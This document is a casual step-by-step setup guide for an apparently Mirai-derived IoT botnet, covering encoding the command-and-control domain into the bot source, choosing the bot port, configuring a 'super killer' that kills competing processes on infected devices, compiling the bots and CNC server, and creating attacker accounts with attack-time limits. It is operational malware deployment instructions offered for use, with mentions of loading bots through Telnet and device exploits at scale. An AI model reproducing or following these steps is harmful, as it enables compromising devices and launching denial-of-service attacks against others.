
Updated setup text doc by ThatOneGuy (Old one was really ass lol...)

REQUIREMENTS SYSTEM
- DEBIAN 10 (Prefered)
- 8GB Ram (Only if loading huge numbers of bots aka, 50k+)
- 1GBPS Network (Prefered)


IMPORTANT - ALL FILES MUST BE IN root/ FOR BUILDER TO WORK -
Also, run everything in dependencies.txt first before doing any of this <3


Step 1: Editing compiling the encoder for the domain.

Go to /tools/
Compile enc: gcc enc.c -o enc
Once compiled go to https://www.noip.com/ and signup to make a domain (or you can buy one)
set the A record to your CNC's IP.
then use enc to encrypt you cnc's domain name
./enc string domain-go-here.com
It will output a hex string with the amount of data that string is, take that data and go to step 2.



Step 2: Editing files for cnc

This cnc has no selfrep so you don't have to deal with that BS.
Edit bot/table.c
You will see "TABLE_CNC_DOMAIN" paste the hex string within the "" and put the value of it at the end


Step 3: Editing bot port

Edit bot/main.c
Line 313 AND line 326 both have "srv_addr.sin_port = htons" on it, edit the port number to whatever you want your bot port to be.
Make sure to write down ur bot port for later

Step 4: Killer editing (VERY IMPORTANT)

If using the super killer version, you need to change the whitelist folder. By default /tmp/OneMan is a safe DIR, you can edit this to whatever you want.
Go to bot/killer.c line 231 edit my dir to what you want to be a safe dir. When loading your bots you can use mkdir create that dir so u can run inside of it.
If you are unable to mkdir for that type of exploit (Or its a private exploit) I would recommend NOT using the super killer. 
Super killer should really only be used for Telnet or other heavily loaded things (such as like ZTE lol)


Step 5: Compiling Bot

If you don't have "dos2unix" installed, install it now with "apt install dos2unix"
Run "dos2unix build.sh"
^ This will fix any fucky wucky shit with bash, don't ask whats wrong its just weird spacing.
Once everything is setup you can start compiling, you will have two build.sh files one for super killer and one for soft killer, use whatever works for what you are making.


Step 6: Compiling CNC

cd into the cnc folder and run this - go get github.com/go-sql-driver/mysql; go get github.com/mattn/go-shellwords
now run these commands
gcc cnc.c -o cnc
go build listen.go                                    VV (Port used in step 3)
now screen ulimit -n999999; ulimit -u9999999; ./cnc 1972 1891 750 <- Threads 750 is max
and screen ulimit -n999999; ulimit -u9999999; ./listen

Step 7: Login files

Once this is setup, your cnc is online, all thats left to do now is setup your login file,
in the cnc folder you will see login.txt the fortmat is
username password -1 attacktime cooldowntime all 0
The 0 on the end means its a user, to make it an admin set this value to a 1 (The only thing admin perms get is to disable attacks and see bot arch)


Congrats, you are done lol. I tried to be as specific as I could in this setup guide so that you can do this easily any time. If you need help tho just hmu ;D